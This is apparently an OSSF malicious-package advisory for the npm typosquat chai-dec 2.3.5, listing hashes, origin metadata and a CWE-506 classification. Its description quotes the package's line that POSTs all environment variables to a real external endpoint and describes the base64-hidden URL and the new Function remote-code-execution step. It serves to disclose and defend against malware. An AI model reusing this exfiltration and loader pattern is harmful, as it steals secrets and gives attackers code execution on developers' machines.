-= Per source details. Do not edit below this line.=-
chai-dec impersonates the chai/pino ecosystem (package name rides on chai; package.json keywords and exports — module.exports.pino = middleware — masquerade as the pino logger). When the exported middleware factory is invoked (the standard Express-style usage), index.js spawns a detached Node child running lib/initializeCaller.js. That script POSTs the entire process.env object to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df via axios.post(apiEndpoint, {...process.env }, { headers: { 'x-secret-header': 'secret' } }), leaking every environment variable on the consumer's machine (AWS/GitHub/npm tokens, DB credentials, CI secrets, etc.). The destination URL is hidden behind a base64 blob in a locally-shadowed process.env.DEV_API_KEY and decoded with atob at runtime to evade static review. The HTTP response body is then passed to new Function('require', response.data) and invoked with the real require, giving the operator of the endpoint arbitrary remote code execution in the consumer process with full Node privileges. This is a typosquat lure carrying a credential-harvest + dynamic-RCE payload.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-005693",
"import_time": "2026-06-11T07:49:41.792565932Z",
"sha256": "5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3",
"source": "amazon-inspector",
"modified_time": "2026-06-11T07:18:08Z",
"versions": [
"2.3.5"
]
}
]
}
{
"evidence_files": [
{
"path": "lib/initializeCaller.js",
"sha256": "fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad",
"tlsh": "f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df"
},
{
"path": "package.json",
"sha256": "cb36fcdc10b8fb077ba9ebf442a53b851683ee6c86f953da370938098eced313",
"tlsh": "91019760ce789e2300ed25824c2a0643b6618c13a928fc2d32db512d0f9d8bf01bf22e"
}
],
"package_integrity": [
{
"filename": "chai-dec-2.3.5.tgz",
"hashes": {
"sha512_sri": "sha512-s5+MofCrzKo3WDjEDqlUyH/KcipEvzT0r3Fu84aHjvtl/qBzTi65LifIvN4efA/9TifLfNUr7MK6YPWcn8GT3Q==",
"sha1": "787de62f68c405baa2f9ab203d2e59431f51614c"
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-dec/MAL-2026-5606.json"
[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]